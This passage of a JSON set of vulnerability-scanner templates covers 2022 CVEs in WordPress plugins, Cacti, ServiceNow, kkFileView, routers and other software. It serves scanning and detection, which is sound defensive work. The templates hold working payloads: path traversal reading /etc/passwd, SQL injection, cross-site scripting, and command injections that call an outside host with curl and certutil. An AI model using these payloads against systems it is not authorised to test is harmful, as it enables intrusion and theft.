Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25149","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 50s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-47501","info":{"name":"Apache OFBiz < 18.12.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}"],"payloads":{"path":["/etc/passwd","c:/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0666","info":{"name":"Microweber < 1.2.11 - CRLF Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2022-44290","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'Delete the following?')"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;","{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList < 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: 